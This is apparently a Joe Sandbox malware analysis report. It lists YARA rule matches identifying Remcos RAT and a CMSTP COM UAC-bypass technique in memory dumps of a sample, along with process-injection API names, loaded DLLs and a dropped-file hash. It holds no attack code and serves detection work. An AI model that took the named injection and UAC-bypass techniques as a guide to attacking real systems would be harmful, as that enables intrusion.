                    Source: 1.2.SndVol.exe.62f194e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 1.2.SndVol.exe.62f194e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 1.2.SndVol.exe.62f194e.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 1.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 1.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 1.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 8.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 8.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 8.2.colorcpl.exe.619194e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.colorcpl.exe.619194e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 8.2.colorcpl.exe.619194e.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000001.00000002.474788319.00000000062F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000001.00000002.474788319.00000000062F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000001.00000002.474788319.00000000062F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000001.00000002.474134003.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000001.00000002.474134003.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000001.00000002.474134003.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000008.00000002.253136648.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000008.00000002.253136648.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000008.00000002.253136648.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000008.00000002.253322818.0000000006190000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000008.00000002.253322818.0000000006190000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000008.00000002.253322818.0000000006190000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: Process Memory Space: SndVol.exe PID: 7120, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: colorcpl.exe PID: 6388, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CB20C4
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0041F04C
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0043E01C
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_004540AA
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_004380B8
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00446140
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0043E24B
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0045327C
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_004272EF
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00437436
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0043E4A8
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_004386C0
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0043784E
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00433898
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0044D899
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00427998
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0041DAB4
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00427B01
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00437C83
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00426D60
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0043DDED
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00435DB1
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00413F18
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00436F3A
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CCD85C InetIsOffline,CoInitialize,CoUninitialize,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,GetCurrentProcess,FlushInstructionCache,GetCurrentProcess,ExitProcess,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeSection loaded: archiveint.dll
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeSection loaded: ???.dll
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeSection loaded: ???.dll
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeSection loaded: ???.dll
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeSection loaded: ??l.dll
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeSection loaded: ??l.dll
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeSection loaded: ????.dll
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeSection loaded: ??l.dll
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeSection loaded: ??l.dll
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeSection loaded: endpointdlp.dll
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeSection loaded: endpointdlp.dll
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeSection loaded: endpointdlp.dll
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeSection loaded: endpointdlp.dll
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeSection loaded: advapi.dll
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeSection loaded: advapi.dll
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeSection loaded: advapi.dll
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeSection loaded: advapi.dll
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeSection loaded: advapi.dll
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeSection loaded: advapi.dll
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeSection loaded: advapi.dll
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeSection loaded: ??l.dll
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFSection loaded: archiveint.dll
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFSection loaded: ???.dll
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFSection loaded: ???.dll
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFSection loaded: ???.dll
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFSection loaded: ??l.dll
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFSection loaded: ??l.dll
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFSection loaded: ????.dll
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFSection loaded: ??l.dll
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFSection loaded: ??l.dll
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFSection loaded: endpointdlp.dll
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFSection loaded: endpointdlp.dll
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFSection loaded: endpointdlp.dll
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFSection loaded: endpointdlp.dll
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFSection loaded: advapi.dll
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFSection loaded: advapi.dll
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFSection loaded: advapi.dll
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFSection loaded: advapi.dll
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFSection loaded: advapi.dll
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFSection loaded: advapi.dll
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFSection loaded: advapi.dll
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFSection loaded: ??l.dll
                    Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\Fnvtdhen.PIF 56A3DC5C90ADE897E349BA0FD0433770DCDDA32B5BD2A1C6608B2AF2F9B34C05
                    Source: Fnvtdhenapsfwu.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: 1.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 1.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 1.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 1.2.SndVol.exe.62f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 1.2.SndVol.exe.62f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 1.2.SndVol.exe.62f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 8.2.colorcpl.exe.6190000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.colorcpl.exe.6190000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 8.2.colorcpl.exe.6190000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 1.2.SndVol.exe.62f0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 1.2.SndVol.exe.62f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 1.2.SndVol.exe.62f0000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 1.2.SndVol.exe.62f194e.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 1.2.SndVol.exe.62f194e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 1.2.SndVol.exe.62f194e.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 8.2.colorcpl.exe.619194e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.colorcpl.exe.619194e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 8.2.colorcpl.exe.619194e.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 8.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 8.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 8.2.colorcpl.exe.6190000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.colorcpl.exe.6190000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 8.2.colorcpl.exe.6190000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 1.2.SndVol.exe.62f194e.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 1.2.SndVol.exe.62f194e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 1.2.SndVol.exe.62f194e.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 1.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 1.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 1.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 8.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 8.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 8.2.colorcpl.exe.619194e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.colorcpl.exe.619194e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 8.2.colorcpl.exe.619194e.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000001.00000002.474788319.00000000062F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000001.00000002.474788319.00000000062F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000001.00000002.474788319.00000000062F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000001.00000002.474134003.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000001.00000002.474134003.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000001.00000002.474134003.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000008.00000002.253136648.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
